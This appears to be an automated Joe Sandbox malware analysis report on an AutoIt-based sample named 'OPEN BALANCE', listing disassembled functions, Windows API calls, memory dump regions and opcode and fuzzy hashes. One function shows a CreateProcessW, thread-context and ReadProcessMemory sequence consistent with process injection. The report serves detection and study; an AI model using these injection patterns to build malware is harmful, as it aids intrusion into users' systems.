CloseHandle.KERNEL32(00000000,?,008B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008B300D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: dc325fef8fe7e5bb4f3a31ab0416c2b483df26b8e88af526d4473e6717c08fc8
Instruction ID: c641df9521cb7baa6208c0ed05747cae5dacc2fae9543998ae88be6ee2b54db2
Opcode Fuzzy Hash: dc325fef8fe7e5bb4f3a31ab0416c2b483df26b8e88af526d4473e6717c08fc8
Instruction Fuzzy Hash: 50E0863228162177D6312755BC0DFCB3B1CEB86B71F104311F719B51D086A0150182A8

Function 00851310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008517F6

Strings

CALL, xrefs: 008517C6

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 1516480753c08d90eb19bee5238b0f541b1e2ea89a49545109bf6296352097d3
Instruction ID: 01a766c27fc66eb77d646f32f7aad56a7b1cac6bf13f38e6ad97680781b5f784
Opcode Fuzzy Hash: 1516480753c08d90eb19bee5238b0f541b1e2ea89a49545109bf6296352097d3
Instruction Fuzzy Hash: 092269706082059FCB14DF18C484B2ABBE1FF85315F18896DF896CB362E771E959CB82

Function 008B6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008B6F6B

Part of subcall function 00844ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 008B6F5A, 008B6F63

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 95d8f3d5bf10030604cb11ecec895a9aa9a9ea4c726b40a00eae24b03e3fe2f4
Instruction ID: b437dbf40ed00ed01890bb84723dc958ffa620bc07a465e734efb3c25e398319
Opcode Fuzzy Hash: 95d8f3d5bf10030604cb11ecec895a9aa9a9ea4c726b40a00eae24b03e3fe2f4
Instruction Fuzzy Hash: A3B13B315087058FCB14EF28C4919AAB7E5FF95314F04896DF496DB2A2EB30ED49CB92

Function 008B2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 008B2587

Strings

EA06, xrefs: 008B25B9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 94687cc894465e668203ffadb47f30cf0453a3fefd4991f0d6c669f5e4beb893
Instruction ID: 9c96723fc0959b0e3f0a68da05280cb92c30aa71cfcaa05b8eef7ce6c95f1d86
Opcode Fuzzy Hash: 94687cc894465e668203ffadb47f30cf0453a3fefd4991f0d6c669f5e4beb893
Instruction Fuzzy Hash: FE01B5729042587EDF28C7A8CC56EEEBBF8EB05305F00455AE152D61C1E5B4E6088B60

Function 00843837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00843908

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: cc7ec47e34e2c32eadef76b9ba1d1b6770d9d6eaf6e8851abb0ac1273b50ad0f
Instruction ID: 259f9d3537dab1f87ea619a7b6c9b0b01d1c17e3b979515b623a75241ab100e2
Opcode Fuzzy Hash: cc7ec47e34e2c32eadef76b9ba1d1b6770d9d6eaf6e8851abb0ac1273b50ad0f
Instruction Fuzzy Hash: 98318FB06057059FD720DF24D885797BBE8FB49708F00092EF6AAC3250E771AA44CB52

Function 0084B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0084BB4E

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 2053cc52b2c4b47a52f3eedddf1f7ee73cd5353fc52282a957dbd0d134a01eda
Instruction ID: 2fb374fe5df18db7c2c7edcc6d9530e787003ec398a230116821410b376d2fc2
Opcode Fuzzy Hash: 2053cc52b2c4b47a52f3eedddf1f7ee73cd5353fc52282a957dbd0d134a01eda
Instruction Fuzzy Hash: 6032A830A0420D9FCF24EF58C894ABABBB9FF44314F188069E915EB251D774ED81DB91

Function 014E129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014E1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014E1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014E1B13

Memory Dump Source

Source File: 00000000.00000002.2061131437.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_OPEN BALANCE.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: db41b82bc9149932217d1607f2e6b1b1242f1882ce481d9569658265b7b68212
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: 6F12FD20E24658C6EB24DF64D8507DEB272FF68700F1090E9910DEB7A4E77A4F81CB5A

Function 008AF2FB Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 008AF314

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 77fddf1ef045406bc06c3cc7da67c05b405c2a7cb4e0d8367b9e087dcfdc4d10
Instruction ID: 6d8ce5d2b95e47145dd2190f9c70e3e484f7f9d89bf9d8cd57cdf3392a5bde26
Opcode Fuzzy Hash: 77fddf1ef045406bc06c3cc7da67c05b405c2a7cb4e0d8367b9e087dcfdc4d10
Instruction Fuzzy Hash: B541B1B2900209AFDB11EFA8C8819AF73B9FF45314F10853EE656DB652EB70DA058B50

Function 00844ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00844E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00844EDD,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844E9C
Part of subcall function 00844E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00844EAE
Part of subcall function 00844E90: FreeLibrary.KERNEL32(00000000,?,?,00844EDD,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844EFD

Part of subcall function 00844E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00883CDE,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844E62
Part of subcall function 00844E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00844E74
Part of subcall function 00844E59: FreeLibrary.KERNEL32(00000000,?,?,00883CDE,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844E87

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 37bc68e9addafae89353665cefc7b4d53cb00919076fe18f0dc7f35ee4fd7194
Instruction ID: 7aa91f4b65754fee463622fb2945fa7eb07cc7a39d6b2a14e9b287399e1389b5
Opcode Fuzzy Hash: 37bc68e9addafae89353665cefc7b4d53cb00919076fe18f0dc7f35ee4fd7194
Instruction Fuzzy Hash: F611E332600209ABCB14BB68DC02FAD77A5FF40B10F10842EF542E61C1EE749A099751

Function 00878402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00878440

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: e5e2b33e9001028d8c543f58f1fc03c8a87c0284bf37b7384655b06a1ac6965a
Instruction ID: be6f79433ae386cd46c47f675298ebcf5f94046d3b4ffa6c6bba998ee129ec3c
Opcode Fuzzy Hash: e5e2b33e9001028d8c543f58f1fc03c8a87c0284bf37b7384655b06a1ac6965a
Instruction Fuzzy Hash: E811187590410AEFCF15DF58E94599A7BF9FF48314F108059F808EB312DA71DA11CBA9

Function 0086E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: aacc67fe8dbfa94172638d00947a1a4a451a3a4553b7477ca38400d2fd051ad8
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: EDF0F436910A14AAC6323E6DDC09F5A3798FF72334F164715F529D22D2CB70D802C6A7

Function 00873820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00911444), ref: 00873852

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f5ccc004e65c56b112c9c683d0ff2c23613a19b75b00fc464ac3da8ebfa8521c
Instruction ID: 622cf25930b6cedf9106fd0bfb14083be981d345c125a95938ab53eb7f9b2cef
Opcode Fuzzy Hash: f5ccc004e65c56b112c9c683d0ff2c23613a19b75b00fc464ac3da8ebfa8521c
Instruction Fuzzy Hash: E2E0E531101225A7D7212A6A9C00F9E3748FB427B0F068132FD1CD2699CB71DE01A2E3

Function 00844F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844F6D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 59fb418aca45d830cf9beaf387ebc8456f31149d2896df6d4f40aacc2d5a3b62
Instruction ID: 6a325857c8219a4b436836543dd74774c2db7d7f672b5e30c0ee26d42388a1d5
Opcode Fuzzy Hash: 59fb418aca45d830cf9beaf387ebc8456f31149d2896df6d4f40aacc2d5a3b62
Instruction Fuzzy Hash: 19F0397110575ACFDB349F64D490A22FBE4FF143293209A7EE2EAC2622CB319848DF10

Function 00842DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00842DC4

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 022ee791caac7aec3b90b000167b5f30d7131599eab618d1deea55b38aa1a461
Instruction ID: 66141e0fe520b8e348e125c63c0c28d0dd9fabb20b678a5290a336cfc3654575
Opcode Fuzzy Hash: 022ee791caac7aec3b90b000167b5f30d7131599eab618d1deea55b38aa1a461
Instruction Fuzzy Hash: 47E0CD726001245BCB10A25C9C05FDA77DDFFC8790F040171FD09D7248DE60AD80C651

Function 008B2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 008B26B5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 2146504badb019365a85d1a5d4d78248891af8c47b774121544808fee3acb207
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 7FE04FB0609B005FDF395A28A8517F777E8EF4A300F00086EF69BC3352E57268468B4D

Function 00842B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00843837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00843908

Part of subcall function 0084D730: GetInputState.USER32 ref: 0084D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00842B6B

Part of subcall function 008430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0084314E

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 915177b6c56e805dde398c513e52e71a32bb2ace17e480c21a2c0caaa0d388d5
Instruction ID: 7ab5ceb18098d53a3d5ca7cb6a32ca1d027346bfe8f7c9ad14fe12679eba5d32
Opcode Fuzzy Hash: 915177b6c56e805dde398c513e52e71a32bb2ace17e480c21a2c0caaa0d388d5
Instruction Fuzzy Hash: FBE0862170424C17CA18BB7C98525BDF759FBD5765F40163EF142C31B3CE6545858253

Function 0088039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00880704,?,?,00000000,?,00880704,00000000,0000000C), ref: 008803B7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5a7f003ed6c7a992d4b873ddc48e8e31eedfd892b54ddb0b380cb9c2628bad20
Instruction ID: 16252e6986986a197a5da8ee5ee23a78772108ac7d09e2a85c3c570725475c86
Opcode Fuzzy Hash: 5a7f003ed6c7a992d4b873ddc48e8e31eedfd892b54ddb0b380cb9c2628bad20
Instruction Fuzzy Hash: E7D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014100FE1856020C732E821EB90

Function 00841CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00841CBC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
